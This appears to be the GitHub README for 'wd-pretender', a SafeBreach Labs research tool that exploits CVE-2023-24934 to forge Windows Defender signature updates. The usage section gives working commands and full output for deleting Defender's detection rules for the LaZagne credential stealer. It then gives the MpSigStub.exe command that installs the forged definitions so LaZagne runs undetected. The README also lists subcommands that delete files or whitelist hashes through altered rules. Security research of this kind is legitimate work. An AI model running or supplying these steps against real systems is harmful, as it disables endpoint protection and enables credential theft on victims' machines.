wd-pretender

TL;DR

Compatible with Windows Defender platform version 4.18.2302.7 and earlier.

Description

wd-pretender is a powerful tool designed to simulate a Windows Defender update using the CVE-2023-24934 vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

Features

Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.

Installation

Windows with Python 3.10+ with the libraries mentioned in the file requirements.txt

Usage

-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
usage: wd-pretender.py command [options]

Windows Defender Update

positional arguments:
  {bypass,delete,friendly}
    bypass              bypass windows defender rules by threat name
    delete              delete file by modifying rules
    friendly            add hash to friendly files threat

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT             output folder for the exported vdm files
  -d DEFINITIONS_PATH   set explicit definitions path

Bypass

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
usage: wd-pretender.py command [options] bypass [-h] threat_name

positional arguments:
  threat_name  delete all threats matching <threat_name>

For example we want to bypass LaZagne rules and be able to execute LaZagne without been detected by Windows Defender.

python wd-pretender.py -o C:\BypassDefs bypass lazagne

Output:

python .\wd-pretender.py -o C:\Definitions bypass lazagne

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
[+] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}
[+] Loading mpasbase.vdm
[+] Loading mpasdlta.vdm
[+] Loading mpavbase.vdm
[+] Loading mpavdlta.vdm
[+] Enumerating Anti-Virus Definitions
[+] Threats Containing: lazagne
        Deleting => b'\xd8!LaZagne'
        Deleting => b'HackTool:Python/LaZagne'
        Deleting => b'HackTool:Python/LaZagne.A!MTB'
        Deleting => b'\xd8!LaZagne!ml'
        Deleting => b'HackTool:Python/LaZagne.D!MTB'
        Deleting => b'\xcc!Golazagne.A!MTB'
        Deleting => b'HackTool:Python/LaZagne.B'
        Deleting => b'\xd8!LaZagne!sms'
        Deleting => b'\xcc!Lazagne.A!MTB'
        Deleting => b'\xcc\xe1Lazagne'
[+] Enumerating Anti-Spyware Definitions
[+] Threats Containing: lazagne
[+] Exporting Definitions into: C:\Definitions
[+] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] Done!

The output displays the deleted threat rules recorded by the tool, indicating the removal of 10 threats from the Anti-Virus definitions. The newly updated definitions have been exported to the user-supplied export path located at C:\BypassDefs.

To proceed, ensure that MpSigStub.exe is copied to the BypassDefs folder. Following that, execute the following command:

MpSigStub.exe /stub 1.1.18500.10 /payload <defintion_new_version>

The export log generated by wd-pretender confirms the presence of the updated definitions with the version indicated as <definition_new_version>.

To verify the successful update, please refer to the "MpSigStub.log" file located in the Temp folder of the user with whom the execution took place. For instance, if the tool was executed with administrator privileges (although it is not a requirement), the log file can be found at C:\Windows\Temp.

License

wd-pretender is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

SafeBreach-Labs/wd-pretender

SafeBreach-Labs

Reviews

Repository Details